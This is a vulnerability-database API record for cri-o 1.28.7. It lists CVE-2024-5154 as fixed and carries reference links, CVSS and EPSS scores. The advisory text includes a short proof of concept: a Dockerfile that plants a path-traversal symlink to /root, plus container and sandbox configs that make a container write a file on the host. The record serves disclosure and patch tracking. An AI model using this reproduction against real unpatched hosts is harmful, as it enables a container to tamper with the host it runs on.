{"url":"http://public2.vulnerablecode.io/api/packages/59121?format=json","purl":"pkg:golang/github.com/cri-o/cri-o@1.28.7","type":"golang","namespace":"github.com/cri-o","name":"cri-o","version":"1.28.7","qualifiers":{},"subpath":"","is_vulnerable":false,"next_non_vulnerable_version":"1.29.1","latest_non_vulnerable_version":"1.31.3","affected_by_vulnerabilities":[],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/18495?format=json","vulnerability_id":"VCID-khm9-52xa-t3ek","summary":"malicious container creates symlink \"mtab\" on the host External\n### Impact\nA malicious container can affect the host by taking advantage of code cri-o added to show the container mounts on the host.\n\nA workload built from this Dockerfile:\n```\nFROM docker.io/library/busybox as source\nRUN mkdir /extra && cd /extra && ln -s ../../../../../../../../root etc\n\nFROM scratch\n\nCOPY --from=source /bin /bin\nCOPY --from=source /lib /lib\nCOPY --from=source /extra .\n\n```\n\nand this container config:\n\n```\n{\n  \"metadata\": {\n      \"name\": \"busybox\"\n  },\n  \"image\":{\n      \"image\": \"localhost/test\"\n  },\n  \"command\": [\n      \"/bin/true\"\n  ],\n  \"linux\": {\n  }\n}\n\n\n```\nand this sandbox config  \n```\n{\n  \"metadata\": {\n    \"name\": \"test-sandbox\",\n    \"namespace\": \"default\",\n    \"attempt\": 1,\n    \"uid\": \"edishd83djaideaduwk28bcsb\"\n  },\n  \"linux\": {\n    \"security_context\": {\n      \"namespace_options\": {\n        \"network\": 2\n      }\n    }\n  }\n}\n\n```\n\nwill create a file on host `/host/mtab`\n\n### Patches\n1.30.1, 1.29.5, 1.28.7\n\n### Workarounds\nUnfortunately not\n\n### References\n_Are there any links users can visit to find out more?_","references":[{"reference_url":"https://access.redhat.com/errata/RHSA-2024:10818","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-07-13T20:15:38Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:10818"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3676","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-07-13T20:15:38Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:3676"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:3700","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-07-13T20:15:38Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:3700"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:4008","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-07-13T20:15:38Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:4008"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:4159","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-07-13T20:15:38Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:4159"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:4486","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-07-13T20:15:38Z/"}],"url":"https://access.redhat.com/errata/RHSA-2024:4486"},{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-5154.json","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-5154.json"},{"reference_url":"https://access.redhat.com/security/cve/CVE-2024-5154","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-07-13T20:15:38Z/"}],"url":"https://access.redhat.com/security/cve/CVE-2024-5154"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-5154","reference_id":"","reference_type":"","scores":[{"value":"0.01678","scoring_system":"epss","scoring_elements":"0.82109","published_at":"2026-04-02T12:55:00Z"},{"value":"0.01678","scoring_system":"epss","scoring_elements":"0.82202","published_at":"2026-04-16T12:55:00Z"},{"value":"0.01678","scoring_system":"epss","scoring_elements":"0.82164","published_at":"2026-04-13T12:55:00Z"},{"value":"0.01678","scoring_system":"epss","scoring_elements":"0.8217","published_at":"2026-04-12T12:55:00Z"},{"value":"0.01678","scoring_system":"epss","scoring_elements":"0.82179","published_at":"2026-04-11T12:55:00Z"},{"value":"0.01678","scoring_system":"epss","scoring_elements":"0.82159","published_at":"2026-04-09T12:55:00Z"},{"value":"0.01678","scoring_system":"epss","scoring_elements":"0.82152","published_at":"2026-04-08T12:55:00Z"},{"value":"0.01678","scoring_system":"epss","scoring_elements":"0.82126","published_at":"2026-04-07T12:55:00Z"},{"value":"0.01678","scoring_system":"epss","scoring_elements":"0.8213","published_at":"2026-04-04T12:55:00Z"},{"value":"0.01705","scoring_system":"epss","scoring_elements":"0.82424","published_at":"2026-05-07T12:55:00Z"},{"value":"0.01705","scoring_system":"epss","scoring_elements":"0.82346","published_at":"2026-04-18T12:55:00Z"},{"value":"0.01705","scoring_system":"epss","scoring_elements":"0.82349","published_at":"2026-04-21T12:55:00Z"},{"value":"0.01705","scoring_system":"epss","scoring_elements":"0.8237","published_at":"2026-04-24T12:55:00Z"},{"value":"0.01705","scoring_system":"epss","scoring_elements":"0.82381","published_at":"2026-04-26T12:55:00Z"},{"value":"0.01705","scoring_system":"epss","scoring_elements":"0.82385","published_at":"2026-04-29T12:55:00Z"},{"value":"0.01705","scoring_system":"epss","scoring_elements":"0.82402","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-5154"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2280190","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-07-13T20:15:38Z/"}],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2280190"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/cri-o/cri-o","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/cri-o/cri-o"},{"reference_url":"https://github.com/cri-o/cri-o/security/advisories/GHSA-j9hf-98c3-wrm8","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-07-13T20:15:38Z/"}],"url":"https://github.com/cri-o/cri-o/security/advisories/GHSA-j9hf-98c3-wrm8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-5154","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-5154"},{"reference_url":"https://pkg.go.dev/vuln/GO-2024-2919","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://pkg.go.dev/vuln/GO-2024-2919"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:3.11","reference_id":"cpe:/a:redhat:openshift:3.11","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:3.11"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4","reference_id":"cpe:/a:redhat:openshift:4","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.12::el8","reference_id":"cpe:/a:redhat:openshift:4.12::el8","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.12::el8"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.13::el8","reference_id":"cpe:/a:redhat:openshift:4.13::el8","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.13::el8"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.13::el9","reference_id":"cpe:/a:redhat:openshift:4.13::el9","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.13::el9"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.14::el8","reference_id":"cpe:/a:redhat:openshift:4.14::el8","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.14::el8"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.14::el9","reference_id":"cpe:/a:redhat:openshift:4.14::el9","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.14::el9"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.15::el8","reference_id":"cpe:/a:redhat:openshift:4.15::el8","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.15::el8"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.15::el9","reference_id":"cpe:/a:redhat:openshift:4.15::el9","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.15::el9"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.16::el8","reference_id":"cpe:/a:redhat:openshift:4.16::el8","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.16::el8"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.16::el9","reference_id":"cpe:/a:redhat:openshift:4.16::el9","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.16::el9"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.17::el9","reference_id":"cpe:/a:redhat:openshift:4.17::el9","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:openshift:4.17::el9"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:8","reference_id":"cpe:/o:redhat:enterprise_linux:8","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:8"},{"reference_url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:9","reference_id":"cpe:/o:redhat:enterprise_linux:9","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/59121?format=json","purl":"pkg:golang/github.com/cri-o/cri-o@1.28.7","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:golang/github.com/cri-o/cri-o@1.28.7"},{"url":"http://public2.vulnerablecode.io/api/packages/59124?format=json","purl":"pkg:golang/github.com/cri-o/cri-o@1.29.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:golang/github.com/cri-o/cri-o@1.29.5"},{"url":"http://public2.vulnerablecode.io/api/packages/59126?format=json","purl":"pkg:golang/github.com/cri-o/cri-o@1.30.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:golang/github.com/cri-o/cri-o@1.30.1"}],"aliases":["CVE-2024-5154","GHSA-j9hf-98c3-wrm8"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-khm9-52xa-t3ek"}],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:golang/github.com/cri-o/cri-o@1.28.7"}